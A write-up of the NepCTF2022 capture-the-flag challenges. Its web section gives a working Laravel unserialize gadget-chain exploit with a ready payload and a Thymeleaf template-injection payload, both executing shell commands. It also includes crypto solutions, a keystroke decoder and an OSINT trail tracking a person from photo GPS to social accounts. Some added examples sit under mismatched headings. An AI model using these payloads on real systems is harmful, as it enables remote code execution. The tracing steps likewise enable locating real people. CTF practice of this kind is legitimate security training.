[CTF]-NepCTF2022
- web
  - Just Kidding
  - Challenger
- Misc
  - 簽到 (sign-in)
  - 花花畫畫畫花花
  - 餡餅?陷阱! (Pie? Trap!)
  - 9點直播 (9 o'clock livestream)
  - 少見的base (a rare base)
  - 原來你也玩智能家居 (so you play with smart-home gear too)
  - DoubleHappiness
- Crypto
  - sinin
  - 中學數學 (middle-school math)
- Re
  - 簽到 (sign-in)
web
Just Kidding
Directory scanning turns up www.zip.
Download it to get the source code, then audit it.

//App\Http\Controllers\HelloController.php
class HelloController extends Controller {
    public function hello(\Illuminate\Http\Request $request)
    {
        // h3 comes straight from the request and is passed to unserialize()
        $h3 = base64_decode($request->input("h3"));
        unserialize($h3);
        return "Welcome Nepctf! GL&HF";
    }
}

This PHP file calls unserialize() on user-controlled input, so it has a deserialization vulnerability.
Look for __destruct() methods.
Follow the __destruct method in src/Illuminate/Broadcasting/PendingBroadcast.php: both $this->events and $this->event are controllable there, so the next step is to find a usable dispatch method.
Follow the dispatch method in src/Illuminate/Bus/Dispatcher.php: $command and $this->queueResolver are both controllable.
Follow dispatchToQueue: $command and $this->queueResolver are again controllable, and it is easy to see that the call_user_func call in this method can be used for command execution.
What remains is the command string itself. Note the line $connection = $command->connection ?? null; in that method's code: $connection can be set through a property of the class in src/Illuminate/Broadcasting/BroadcastEvent.php, which gives command execution.
//exp:
<?php
namespace Illuminate\Contracts\Queue {
    interface ShouldQueue {}
}

namespace Illuminate\Bus {
    class Dispatcher {
        protected $container;
        protected $pipeline;
        protected $pipes = [];
        protected $handlers = [];
        protected $queueResolver;
        function __construct() {
            $this->queueResolver = "system";
        }
    }
}

namespace Illuminate\Broadcasting {
    use Illuminate\Contracts\Queue\ShouldQueue;
    class BroadcastEvent implements ShouldQueue {
        function __construct() {}
    }
    class PendingBroadcast {
        protected $events;
        protected $event;
        function __construct() {
            $this->event = new BroadcastEvent();
            $this->event->connection = "cat /flag";
            $this->events = new \Illuminate\Bus\Dispatcher();
        }
    }
}

namespace {
    $pop = new \Illuminate\Broadcasting\PendingBroadcast();
    echo base64_encode(serialize($pop));
}

payload:
/hello?h3=Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MjU6IklsbHVtaW5hdGVcQnVzXERpc3BhdGNoZXIiOjU6e3M6MTI6IgAqAGNvbnRhaW5lciI7TjtzOjExOiIAKgBwaXBlbGluZSI7TjtzOjg6IgAqAHBpcGVzIjthOjA6e31zOjExOiIAKgBoYW5kbGVycyI7YTowOnt9czoxNjoiACoAcXVldWVSZXNvbHZlciI7czo2OiJzeXN0ZW0iO31zOjg6IgAqAGV2ZW50IjtPOjM4OiJJbGx1bWluYXRlXEJyb2FkY2FzdGluZ1xCcm9hZGNhc3RFdmVudCI6MTp7czoxMDoiY29ubmVjdGlvbiI7czo5OiJjYXQgL2ZsYWciO319

Challenger
Code audit

//key code
@GetMapping({"/eval"})
public String path(@RequestParam String lang) {
    return "user/" + lang + "/welcome";
}

The view name is built from the lang parameter, so this can be exploited with Thymeleaf template injection.
Visit /eval.
It requires a lang parameter.
Then find the payload:
?lang=__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22cat /flag%22).getInputStream()).next()%7d__::.x

Misc
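Both payloads in these two challenges travel in a single request parameter, which makes them easy to pick out of an access log. The script below is an added example (it is not part of the writeup or of either challenge) that flags a base64-encoded serialized PHP object in any parameter and reports its class name, and flags Thymeleaf preprocessing markers or SpEL type references in a parameter. The log lines and the serialized object are constructed samples; only the parameter names h3 and lang come from the challenges.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, quote, urlsplit

# Signature of a serialized PHP object: O:<len>:"<class>":<count>:{
PHP_OBJECT_RE = re.compile(rb'O:\d+:"([A-Za-z0-9_\\]+)":\d+:\{')
# Thymeleaf preprocessing wrapper (__${...}__, __#{...}__, ...) or a SpEL
# type reference T(java....) inside a request parameter.
THYMELEAF_RE = re.compile(r'__[$#*@~]\{|T\(\s*java\.')


def try_base64(value):
    """Return the decoded bytes when value is base64 text, else None.
    A raw '+' in an unencoded query string arrives as a space, so it is
    restored before decoding; missing padding is tolerated."""
    candidate = value.replace(" ", "+")
    candidate += "=" * (-len(candidate) % 4)
    try:
        return base64.b64decode(candidate, validate=True)
    except (binascii.Error, ValueError):
        return None


def analyze_request(request_line):
    """Inspect one 'METHOD /path?query ...' line; return a list of findings
    of the form '<indicator>:<parameter>[:<class>]'."""
    parts = request_line.split()
    if len(parts) < 2:
        return []
    query = urlsplit(parts[1]).query
    findings = []
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            if THYMELEAF_RE.search(value):
                findings.append(f"thymeleaf-preprocessing:{name}")
            raw = try_base64(value)
            if raw is None:
                continue
            for match in PHP_OBJECT_RE.finditer(raw):
                findings.append(f"php-serialized-object:{name}:{match.group(1).decode()}")
    return findings


def scan_log(lines):
    """Map 1-based line number -> findings for every line that triggers."""
    hits = {}
    for number, line in enumerate(lines, start=1):
        found = analyze_request(line)
        if found:
            hits[number] = found
    return hits


# Constructed sample request lines (not taken from any real log). The first
# carries a base64-encoded serialized PendingBroadcast object with an empty
# body; the second carries a Thymeleaf preprocessing expression in lang.
SERIALIZED_OBJECT = b'O:40:"Illuminate\\Broadcasting\\PendingBroadcast":2:{}'
SAMPLE_LOG = [
    "GET /hello?h3=" + quote(base64.b64encode(SERIALIZED_OBJECT).decode(), safe="") + " HTTP/1.1",
    "GET /eval?lang=" + quote("__${T(java.lang.Runtime)}__::.x", safe="") + " HTTP/1.1",
    "GET /hello?h3=" + quote(base64.b64encode(b"just a string").decode(), safe="") + " HTTP/1.1",
    "GET /eval?lang=en HTTP/1.1",
]

if __name__ == "__main__":
    for number, found in scan_log(SAMPLE_LOG).items():
        print(number, found)
```

The base64 check decodes every parameter rather than only h3, because the gadget chain works wherever the application deserializes; the class name in the finding is what lets an analyst tell a PendingBroadcast chain from a harmless serialized value.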
簽到 (sign-in)
Nested archives, 230-odd layers deep.

┌──(root㉿kali)-[/home/muz1/桌面]
└─# binwalk xxx.jpg

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01
33877         0x8455          Zip archive data, at least v1.0 to extract, compressed size: 77532, uncompressed size: 77532, name: 232.zip
111452        0x1B35C         End of Zip archive, footer length: 22
111709        0x1B45D         End of Zip archive, footer length: 22

┌──(root㉿kali)-[/home/muz1/桌面]
└─# foremost xxx.jpg
Processing: xxx.jpg
|foundat=232.zipUT
foundat=繼續解壓呀 UT
*|

Pseudo-encryption: the zip's encryption flag bit is set although the data is not actually encrypted, so change the flag field's value.
Extracting it yields a packet capture.
Then extract the USB data with tshark:
tshark.exe -r .\keyboard.pcap -T fields -e usb.capdata > usbdata.txt

0000110000000000
0000000000000000
0000080000000000
0000000000000000
0000130000000000
0000000000000000
0000060000000000
0000000000000000
0000170000000000
0000000000000000
0000090000000000
0000000000000000
0200000000000000
02002f0000000000
0200000000000000
0000000000000000
00001a0000000000
00001a0800000000
0000080000000000
0000000000000000
00000f0000000000
0000000000000000
0000060000000000
0000000000000000
0000120000000000
0000121000000000
0000100000000000
0000000000000000
0000080000000000
0000000000000000
2000000000000000
20002d0000000000
0000000000000000
0000170000000000
0000120000000000
0000000000000000
2000000000000000
20002d0000000000
0000000000000000
0000110000000000
0000000000000000
0000080000000000
0000000000000000
0000130000000000
0000000000000000
0000060000000000
0000000000000000
0000170000000000
0000000000000000
0000090000000000
0000000000000000
2000000000000000
20002d0000000000
0000000000000000
00001f0000000000
0000000000000000
0000110000000000
0000000000000000
0000070000000000
0000000000000000
0200000000000000
0200300000000000
0200000000000000
0000000000000000
0000280000000000
0000000000000000

Convert the format (insert a colon between every pair of hex digits):
# Input is the tshark output above (saved as usbdata.txt; this script reads it as data.txt).
# PowerShell's > redirection writes UTF-16, hence the encoding on both files.
f = open('data.txt', 'r', encoding='utf-16')
fi = open('out.txt', 'w', encoding='utf-16')
while 1:
    a = f.readline().strip()
    if a:
        if len(a) == 16:  # for mouse traffic change len to 8
            out = ''
            for i in range(0, len(a), 2):
                if i + 2 != len(a):
                    out += a[i] + a[i + 1] + ":"
                else:
                    out += a[i] + a[i + 1]
            fi.write(out)
            fi.write('\n')
    else:
        break
f.close()
fi.close()

Then extract the key information:
# USB HID keycode -> character, without and with Shift (US layout)
normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j",
              "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t",
              "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z", "1e":"1", "1f":"2", "20":"3", "21":"4",
              "22":"5", "23":"6", "24":"7", "25":"8", "26":"9", "27":"0", "28":"<RET>", "29":"<ESC>", "2a":"<DEL>", "2b":"\t",
              "2c":"<SPACE>", "2d":"-", "2e":"=", "2f":"[", "30":"]", "31":"\\", "32":"<NON>", "33":";", "34":"'", "35":"<GA>",
              "36":",", "37":".", "38":"/", "39":"<CAP>", "3a":"<F1>", "3b":"<F2>", "3c":"<F3>", "3d":"<F4>", "3e":"<F5>", "3f":"<F6>",
              "40":"<F7>", "41":"<F8>", "42":"<F9>", "43":"<F10>", "44":"<F11>", "45":"<F12>"}
shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J",
             "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T",
             "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z", "1e":"!", "1f":"@", "20":"#", "21":"$",
             "22":"%", "23":"^", "24":"&", "25":"*", "26":"(", "27":")", "28":"<RET>", "29":"<ESC>", "2a":"<DEL>", "2b":"\t",
             "2c":"<SPACE>", "2d":"_", "2e":"+", "2f":"{", "30":"}", "31":"|", "32":"<NON>", "33":"\"", "34":":", "35":"<GA>",
             "36":"<", "37":">", "38":"?", "39":"<CAP>", "3a":"<F1>", "3b":"<F2>", "3c":"<F3>", "3d":"<F4>", "3e":"<F5>", "3f":"<F6>",
             "40":"<F7>", "41":"<F8>", "42":"<F9>", "43":"<F10>", "44":"<F11>", "45":"<F12>"}

output = []
keys = open('out.txt', 'r', encoding='utf-16')
for line in keys:
    try:
        # each line is "mm:00:kk:00:00:00:00:00": mm = modifier byte, kk = keycode.
        # keep only reports with modifier 00 or 02 (left Shift) and a non-zero keycode
        if line[0] != '0' or (line[1] != '0' and line[1] != '2') or line[3] != '0' or line[4] != '0' or line[9] != '0' or line[10] != '0' or line[12] != '0' or line[13] != '0' or line[15] != '0' or line[16] != '0' or line[18] != '0' or line[19] != '0' or line[21] != '0' or line[22] != '0' or line[6:8] == "00":
            continue
        if line[6:8] in normalKeys.keys():
            output += [[normalKeys[line[6:8]]], [shiftKeys[line[6:8]]]][line[1] == '2']
        else:
            output += ['[unknown]']
    except:
        pass
keys.close()

flag = 0
print("".join(output))
# apply Backspace: drop the marker and the character before it
for i in range(len(output)):
    try:
        a = output.index('<DEL>')
        del output[a]
        del output[a - 1]
    except:
        pass
# apply Caps Lock: upper-case everything between two <CAP> markers
for i in range(len(output)):
    try:
        if output[i] == "<CAP>":
            flag += 1
            output.pop(i)
        if flag == 2:
            flag = 0
        if flag != 0:
            output[i] = output[i].upper()
    except:
        pass
print('output :' + "".join(output))

output :nepctf{welcometonepctf2nd}<RET>
nepctf{welcome_to_nepctf_2nd}

花花畫畫畫花花
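The two scripts above get there, but their filter keeps only reports whose modifier byte is 00 or 02, so the right-Shift reports (20002d...) that type the underscores are dropped, which is why the printed output lacks them. The decoder below is an added example (not the writeup's code) that reads the raw 8-byte HID reports directly, honours both Shift modifiers, Caps Lock and Backspace, and emits a key only when it is newly pressed, so a key still held in the next report is not typed twice. The sample input is the usb.capdata listing from the tshark output above; the US keymap is an assumption.

```python
# Added example: decode USB HID boot-protocol keyboard reports into text.
# Report layout: byte 0 = modifier bits (0x02 left Shift, 0x20 right Shift),
# byte 1 reserved, bytes 2..7 = up to six keycodes currently held down.

LETTERS = "abcdefghijklmnopqrstuvwxyz"                 # keycodes 0x04..0x1d
DIGITS, DIGITS_SHIFTED = "1234567890", "!@#$%^&*()"   # keycodes 0x1e..0x27
PUNCTUATION = {                                        # keycode: (plain, shifted)
    0x2c: (" ", " "), 0x2d: ("-", "_"), 0x2e: ("=", "+"), 0x2f: ("[", "{"),
    0x30: ("]", "}"), 0x31: ("\\", "|"), 0x33: (";", ":"), 0x34: ("'", '"'),
    0x35: ("`", "~"), 0x36: (",", "<"), 0x37: (".", ">"), 0x38: ("/", "?"),
}
KEY_ENTER, KEY_BACKSPACE, KEY_TAB, KEY_CAPSLOCK = 0x28, 0x2a, 0x2b, 0x39
SHIFT_MASK = 0x02 | 0x20


def keycode_to_char(code, shift, capslock):
    """Translate one keycode to text for a US layout; None if unprintable."""
    if 0x04 <= code <= 0x1d:
        letter = LETTERS[code - 0x04]
        return letter.upper() if shift != capslock else letter
    if 0x1e <= code <= 0x27:
        return (DIGITS_SHIFTED if shift else DIGITS)[code - 0x1e]
    if code in PUNCTUATION:
        return PUNCTUATION[code][1 if shift else 0]
    if code == KEY_ENTER:
        return "\n"
    if code == KEY_TAB:
        return "\t"
    return None


def decode_reports(hex_reports):
    """Turn a sequence of 8-byte reports (hex strings) into the typed text.
    Only keys absent from the previous report are emitted, so a key that is
    still held in the next report is not typed twice."""
    typed = []
    capslock = False
    previous = set()
    for report in hex_reports:
        data = bytes.fromhex(report)
        if len(data) != 8:          # not a keyboard report (e.g. mouse traffic)
            continue
        shift = bool(data[0] & SHIFT_MASK)
        held = [code for code in data[2:8] if code]
        for code in held:
            if code in previous:
                continue
            if code == KEY_CAPSLOCK:
                capslock = not capslock
            elif code == KEY_BACKSPACE:
                if typed:
                    typed.pop()
            else:
                char = keycode_to_char(code, shift, capslock)
                typed.append(char if char is not None else f"<{code:02x}>")
        previous = set(held)
    return "".join(typed)


# The usb.capdata lines from the writeup's tshark output, used as sample input.
SAMPLE_REPORTS = """
0000110000000000 0000000000000000 0000080000000000 0000000000000000
0000130000000000 0000000000000000 0000060000000000 0000000000000000
0000170000000000 0000000000000000 0000090000000000 0000000000000000
0200000000000000 02002f0000000000 0200000000000000 0000000000000000
00001a0000000000 00001a0800000000 0000080000000000 0000000000000000
00000f0000000000 0000000000000000 0000060000000000 0000000000000000
0000120000000000 0000121000000000 0000100000000000 0000000000000000
0000080000000000 0000000000000000 2000000000000000 20002d0000000000
0000000000000000 0000170000000000 0000120000000000 0000000000000000
2000000000000000 20002d0000000000 0000000000000000 0000110000000000
0000000000000000 0000080000000000 0000000000000000 0000130000000000
0000000000000000 0000060000000000 0000000000000000 0000170000000000
0000000000000000 0000090000000000 0000000000000000 2000000000000000
20002d0000000000 0000000000000000 00001f0000000000 0000000000000000
0000110000000000 0000000000000000 0000070000000000 0000000000000000
0200000000000000 0200300000000000 0200000000000000 0000000000000000
0000280000000000 0000000000000000
""".split()

if __name__ == "__main__":
    print(repr(decode_reports(SAMPLE_REPORTS)))
```

Feed it the usb.capdata field of the capture one report per line (the same tshark command as above) and it yields the flag with the underscores in place; the report-diffing is what makes rollover reports such as 00001a08... decode to a single new key instead of a repeat.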
The .osu file suggests the rhythm game osu!.
After installing it, drop the folder into the Songs directory to play or edit the beatmap.
NepCTF{MASTER_OF_壞女人!}

餡餅?陷阱! (Pie? Trap!)
瓊 -> Hainan (瓊 is the abbreviation of Hainan province)
Google Maps, locate Hainan
Search for Home Inn (如家酒店)
China Everbright Bank (中國光大銀行)
NepCTF{www.cebbank.com}

9點直播 (9 o'clock livestream)
Livestream room giveaway.
少見的base (a rare base)
Nothing to see in 010 Editor.
Nothing from binwalk either:

┌──(root㉿kali)-[~/桌面]
└─# binwalk bbbbase.jpg

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01

Eventually tried Jphswin (JPHS for Windows):
Select file --> Seek --> no passphrase --> save file
Open the result in 010 Editor --> decode
flag{Real_qiandao~}

原來你也玩智能家居 (so you play with smart-home gear too)
Log in with admin / admin.
There is a toggle button on the home page.
Here MQTT's wildcard feature can be used to capture all the data under cmnd, i.e. subscribe to cmnd/#.
Click the toggle button.
DoubleHappiness
Open the image with Honeyview.
Click GPS.
Look up the shops nearby.
The nearby Luckin Coffee branch is 瑞幸咖啡 (蓮花商務中心店).
Find the shop in the Meituan delivery app and look at the review dated 13 July.
Search Weibo for Tr0jAn-
Sure enough, that's the guy. His latest post has a night photo of West Lake taken from Baoshi Hill; the watermark in the lower-right corner is mosaicked, and the letters NepCTF can faintly be made out.
Crop the mosaic out first.
Then recover it with the unRedacter tool. Note that the cropped mosaic needs to be rescaled (304x40), and uppercase letters, digits and the underscore must be added to the dictionary.
NepCTF{ti_0d_nAj0r}

Crypto
sinin
Factor N with yafu:

P309 = 141264221379693044160345378758459195879285464451894666001807667429134348549398732060237738374405784248735752195059908618618110595213605790125890251970818437656069617772772793421437649079362238861287098916200835889507111259332056471215428085418047179545017193159169629731673653136069647622114441162534727202901
P309 = 141264221379693044160345378758459195879285464451894666001807667429134348549398732060237738374405784248735752195059908618618110595213605790125890251970818437656069617772772793421437649079362238861287098916200835889507111259332056471215428085418047179545017193159169629731673653136069647622114441162534727202891

This gives p and q; combining them with c_mod_p and c_mod_q (Chinese remainder theorem) yields c.
# gcd of two numbers
def gcd(a, b):
    if b == 0:
        return a
    else:
        return gcd(b, a % b)

# check that every pair of numbers in the list is coprime
def compare(list):
    for i in range(0, len(list)):
        flag = 1
        for j in range(i + 1, len(list)):
            if gcd(list[i], list[j]) != 1:
                print('不能直接使用中國剩餘定理!')
                exit()
    # if the condition holds execution continues, otherwise the program exits

# product m of the inputs m1, m2, ..., mk
def product_m(list):
    m = 1
    for i in list:
        m *= i
    return m

# compute M1, M2, ..., Mk with Mj = m / mj and return them as a list
def get_divsion(list, m):
    div = []
    for i in list:
        div.append(m // i)
    return div

def get_inverse(a, m):
    # inverse of a modulo m; this function returns a single value, not a list
    if gcd(a, m) != 1:
        return None
    u1, u2, u3 = 1, 0, a
    v1, v2, v3 = 0, 1, m
    while v3 != 0:
        q = u3 // v3
        v1, v2, v3, u1, u2, u3 = (u1 - q * v1), (u2 - q * v2), (u3 - q * v3), v1, v2, v3
    return u1 % m

# compute Xj; the formula is Xj = (M * M_INVERSE * a) % mj
def get_x(M: int, M_inverse: int, a: int, m: int):
    product_x = (M * M_inverse * a) % m
    return product_x

# final answer X = X1 + X2 + ... + Xk
def get_solution(list_m, list_a):
    # compare(list_m)
    m = product_m(list_m)
    list_M = get_divsion(list_m, m)
    list_M_inverse = []
    list_X = []
    total = 0
    for i in range(0, len(list_M)):
        list_M_inverse.append(get_inverse(list_M[i], list_m[i]))
    for i in range(len(list_M)):
        list_X.append(get_x(list_M[i], list_M_inverse[i], list_a[i], m))
    for x in list_X:
        total += x
    return total % m

# test data: moduli p, q and the residues c mod p, c mod q
list_m = [141264221379693044160345378758459195879285464451894666001807667429134348549398732060237738374405784248735752195059908618618110595213605790125890251970818437656069617772772793421437649079362238861287098916200835889507111259332056471215428085418047179545017193159169629731673653136069647622114441162534727202901,
          141264221379693044160345378758459195879285464451894666001807667429134348549398732060237738374405784248735752195059908618618110595213605790125890251970818437656069617772772793421437649079362238861287098916200835889507111259332056471215428085418047179545017193159169629731673653136069647622114441162534727202891]
list_a = [32087476819370469840242617415402189007173583393431940289526096277088796498999849060235750455260897143027010566292541554247738211165214410052782944239055659645055068913404216441100218886028415095562520911677409842046139862877354601487378542714918065194110094824176055917454013488494374453496445104680546085816,
          59525076096565721328350936302014853798695106815890830036017737946936659488345231377005951566231961079087016626410792549096788255680730275579842963019533111895111371299157077454009624496993522735647049730706272867590368692485377454608513865895352910757518148630781337674813729235453169946609851250274688614922]
print(get_solution(list_m, list_a))
# calling get_solution() applies the Chinese remainder theorem
# get_solution() takes two lists, list_a and list_m
# read in list_a and list_m as integers; substituting them gives c, then continue with the code below
from Crypto.Util.number import long_to_bytes

def fast_power(base, power, MOD):
    result = 1
    while power > 0:
        # If power is odd
        if power % 2 == 1:
            result = (result * base) % MOD
        # Divide the power by 2
        power = power // 2
        # Multiply base to itself
        base = (base * base) % MOD
    return result

def gcd(a, b):
    while a != 0:
        a, b = b % a, a
    return b

# calc : b^(-1) mod m
def findModeInverse(b, m, show=True):
    if gcd(m, b) != 1:
        return None
    A1, A2, A3 = 1, 0, m
    B1, B2, B3 = 0, 1, b
    if show:
        print('-' * 54)
        print("|{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}|".format("Q", "A1", "A2", "A3", "B1", "B2", "B3"))
        print("|{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}|".format("-", A1, A2, A3, B1, B2, B3))
    while True:
        Q = A3 // B3
        B1, B2, B3, A1, A2, A3 = (A1 - Q * B1), (A2 - Q * B2), (A3 - Q * B3), B1, B2, B3
        if show:
            print("|{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}|".format(Q, A1, A2, A3, B1, B2, B3))
        if B3 == 0:
            return None
        elif B3 == 1:
            break
    if show:
        print("-" * 54)
    return B2 % m

p = 141264221379693044160345378758459195879285464451894666001807667429134348549398732060237738374405784248735752195059908618618110595213605790125890251970818437656069617772772793421437649079362238861287098916200835889507111259332056471215428085418047179545017193159169629731673653136069647622114441162534727202901
q = 141264221379693044160345378758459195879285464451894666001807667429134348549398732060237738374405784248735752195059908618618110595213605790125890251970818437656069617772772793421437649079362238861287098916200835889507111259332056471215428085418047179545017193159169629731673653136069647622114441162534727202891
d = 1252990107815050396131095071106875863839625463162341861437776714252424196867083751438050781152678454544290561348477588314424473974689219719915628330383292496262245806653795391680166551537602119522395725446199697857165189662727850129646294082998077471030893379415607095699225984851603694723276083262879311002929800558428024700747018831268269585502183294987547669372754175415834581968714034535861714455512875208618004858007748676310828573704007774858023825900743373244384093983022857223181677619286464710238287796148593564498619278346936626883260434122906742989245858429095035901635408963549294384055658232382801968473
c = 11585753035364453623378164545833713948934121662572481093551492504984285077422719062455876099192809170965528989978916297975142142402092047776685650391890015591851053625214326683661927557815767412532952834312578481775648269348260126890551800182341487341482624921905494384205411870866282984671167687789838745481283560185866063970417999748309023918055613674098243729965218609202078551918246640314724590879724609275497227193516782920583249761139685192331805838597293957173545581106446048233248746840771791319643962479707861560044363232580020690857525268858245122996322707454824806268698526881569554077998480289824923073346

dp = d % (p-1)
dq = d % (q-1)
Cp = c % p
Cq = c % q
a = findModeInverse(q, p, False)  # inverse of q modulo p : 114
Mp = fast_power(Cp, dp, p)  # 102
Mq = fast_power(Cq, dq, q)  # 120
b = (a * ((Mp - Mq) % p)) % p
c = Mq + b*q  # Garner's recombination; c now holds the plaintext integer
print("CRT的解密結果:", c)
print(long_to_bytes(c))

NepCTF{ju5t_d0_f4ct_4nd_crt_th3n_d3crypt}

中學數學 (middle-school math)
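The two scripts above do the work in two pieces: a general CRT routine, then the Garner step of CRT-RSA. The following is an added example (not the writeup's code) that does both with toy parameters and checks the result against an ordinary pow(c, d, n): c is rebuilt from c mod p and c mod q, then decrypted using d_p, d_q and q^-1 mod p. The primes 999983 and 1000003 and the message are constructed; the functions work unchanged on the 1024-bit values from the challenge.

```python
# Added example: recover c from its residues modulo p and q with the Chinese
# remainder theorem, then decrypt with CRT-RSA (Garner's recombination).
# Toy parameters keep the arithmetic visible; the technique is the same for
# the challenge's 1024-bit primes.

def crt(residues, moduli):
    """General CRT for pairwise coprime moduli: the unique x (mod product)
    with x = residues[i] (mod moduli[i]) for every i."""
    product = 1
    for modulus in moduli:
        product *= modulus
    total = 0
    for residue, modulus in zip(residues, moduli):
        partial = product // modulus                 # M_i
        inverse = pow(partial, -1, modulus)          # M_i^-1 mod m_i
        total += residue * partial * inverse
    return total % product


def rsa_crt_decrypt(c, p, q, d):
    """RSA decryption with d_p, d_q and Garner's formula: two half-size
    exponentiations instead of one modulo n."""
    dp, dq = d % (p - 1), d % (q - 1)
    mp = pow(c % p, dp, p)
    mq = pow(c % q, dq, q)
    q_inv = pow(q, -1, p)
    h = (q_inv * (mp - mq)) % p
    return mq + h * q


# Constructed toy key: two known primes and the usual public exponent.
P, Q, E = 999983, 1000003, 65537
N = P * Q
D = pow(E, -1, (P - 1) * (Q - 1))


def encrypt(message_bytes):
    """Textbook RSA encryption of a short message (must be smaller than N)."""
    return pow(int.from_bytes(message_bytes, "big"), E, N)


def recover_and_decrypt(c_mod_p, c_mod_q):
    """What the challenge asks for: rebuild c from its two residues, then
    decrypt it, returning the plaintext bytes."""
    c = crt([c_mod_p, c_mod_q], [P, Q])
    m = rsa_crt_decrypt(c, P, Q, D)
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


if __name__ == "__main__":
    c = encrypt(b"crt")
    print(recover_and_decrypt(c % P, c % Q))
```

Because the challenge hands out c mod p and c mod q rather than c, the CRT step is not optional: the residues alone determine c only once p and q are known, which is why factoring N came first.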
from gmpy2 import *
# from Crypto.Util.number import *
from Crypto import *
from secret import *

p = getPrime(1024)
q = next_prime(p + (p >> 500))
e = 0x10001
n = p * q
c = pow(bytes_to_long(flag), e, n)
print("n=", n)
print("c=", c)
'''
n= 13776679754786305830793674359562910178503525293501875259698297791987196248336062506951151345232816992904634767521007443634017633687862289928715870204388479258679577315915061740028494078672493226329115247979108035669870651598111762906959057540508657823948600824548819666985698501483261504641066030188603032714383272686110228221709062681957025702835354151145335986966796484545336983392388743498515384930244837403932600464428196236533563039992819408281355416477094656741439388971695931526610641826910750926961557362454734732247864647404836037293509009829775634926600458845832805085222154851310850740227722601054242115507
c= 6253975396639688013947622483271226838902346034187241970785550830715516801386404802832796746428068354515287579293520381463797045055114065533348514688044281004266071342722261719304097175009672596062130939189624163728328429608123325223000160428261082507446604698345173189268359115612698883860396660563679801383563588818099088505120717238037463747828729693649297904035253985982099474025883550074375828799938384533606092448272306356003096283602697757642323962299153853559914553690456801745940925602411053578841756504799815771173679267389055390097241148454899265156705442028845650177138185876173539754631720573266723359186
'''

The source shows that p and q are close, but the script I used did not produce a result.
There is also Fermat's method for the case where p and q are close.
Find a Fermat factorization script.
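For reference, an added example (not the writeup's script) of Fermat's method together with the step estimate that tells you in advance whether it is worth running: for q - p = gap the search needs about gap^2 / (8 sqrt(n)) increments of a before a^2 - n becomes a perfect square. In this challenge q is the next prime after p + (p >> 500), so the gap is roughly p / 2^500 and the estimate is on the order of 2^21 steps, each one an integer square root of a 2048-bit number. The test moduli below are constructed from small primes.

```python
# Added example: Fermat factorisation for a modulus whose prime factors are
# close together, plus the a-priori estimate of how many steps it will take.
from math import isqrt


def fermat_factor(n, max_steps=10_000_000):
    """Search a = ceil(sqrt(n)), a+1, ... until a^2 - n is a perfect square
    b^2; then n = (a - b)(a + b). Returns (p, q, steps) or None if the
    step budget runs out (factors too far apart for this method)."""
    if n % 2 == 0:
        return 2, n // 2, 0
    a = isqrt(n)
    if a * a < n:
        a += 1
    for steps in range(max_steps):
        b_squared = a * a - n
        b = isqrt(b_squared)
        if b * b == b_squared:
            return a - b, a + b, steps
        a += 1
    return None


def estimated_steps(n, gap):
    """Number of a-values Fermat must try when q - p = gap:
    (p + q)/2 - sqrt(n) is approximately gap^2 / (8 sqrt(n))."""
    return gap * gap // (8 * isqrt(n))


# Constructed test moduli from small primes; the second pair is a few steps apart.
CLOSE_N = 10007 * 10009
FARTHER_N = 97 * 127

if __name__ == "__main__":
    for n in (CLOSE_N, FARTHER_N):
        print(n, fermat_factor(n))
```

The estimate is the useful part in practice: if gap^2 / (8 sqrt(n)) comes out astronomically large, Fermat is the wrong tool and the step counter in fermat_factor will simply exhaust its budget.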
Re
簽到 (sign-in)
Open it in IDA and fix the error it throws (edit the cfg file and adjust the graph view settings).
The flag is in the lower-left corner.